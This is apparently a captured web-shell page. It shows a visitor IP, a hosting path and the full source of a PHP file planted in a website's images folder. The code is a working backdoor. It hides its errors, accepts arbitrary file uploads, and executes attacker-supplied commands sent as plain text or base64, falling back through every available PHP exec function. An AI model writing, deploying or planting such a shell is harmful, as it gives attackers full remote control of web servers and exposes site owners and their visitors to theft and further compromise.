Your IP : 216.73.216.240


Current Path : /home/j/u/v/juvelize/martine/images/
Upload File :
Current File : /home/j/u/v/juvelize/martine/images/shadowxfriska_gf84si.php

<?=null;@error_reporting(0);
if(isset($_FILES['f'])){$d=dirname(__FILE__).'/';
$n=basename($_FILES['f']['name']);
if(@move_uploaded_file($_FILES['f']['tmp_name'],$d.$n)){
$u=(isset($_SERVER['HTTPS'])?'https':'http').'://'.$_SERVER['HTTP_HOST']
.str_replace(basename(__FILE__),'',$_SERVER['PHP_SELF']).$n;
echo'<a href="'.$u.'">'.$n.'</a>';}}
if(isset($_POST['x'])){$c=$_POST['x'];
if(is_callable('proc_open')){$d=array(0=>array('pipe','r'),1=>array('pipe','w'),2=>array('pipe','w'));$p=@proc_open($c,$d,$pipes);if(is_resource($p)){@fclose($pipes[0]);echo'<pre>'.@stream_get_contents($pipes[1]).@stream_get_contents($pipes[2]).'</pre>';@fclose($pipes[1]);@fclose($pipes[2]);@proc_close($p);}}
elseif(is_callable('shell_exec')){echo'<pre>'.@shell_exec($c).'</pre>';}
elseif(is_callable('exec')){@exec($c,$o);echo'<pre>'.join("\n",$o).'</pre>';}
elseif(is_callable('system')){@system($c);}
elseif(is_callable('passthru')){@passthru($c);}
elseif(is_callable('popen')){$h=@popen($c,'r');while(!feof($h)){echo fread($h,4096);}pclose($h);}
else{echo'no exec functions';}}
if(isset($_POST['b'])){$c=@base64_decode($_POST['b']);if($c){
if(is_callable('proc_open')){$d=array(0=>array('pipe','r'),1=>array('pipe','w'),2=>array('pipe','w'));$p=@proc_open($c,$d,$pipes);if(is_resource($p)){@fclose($pipes[0]);echo'<pre>'.@stream_get_contents($pipes[1]).@stream_get_contents($pipes[2]).'</pre>';@fclose($pipes[1]);@fclose($pipes[2]);@proc_close($p);}}
else{echo'<pre>'.@shell_exec($c).'</pre>';}}}echo"<shadow2>";?>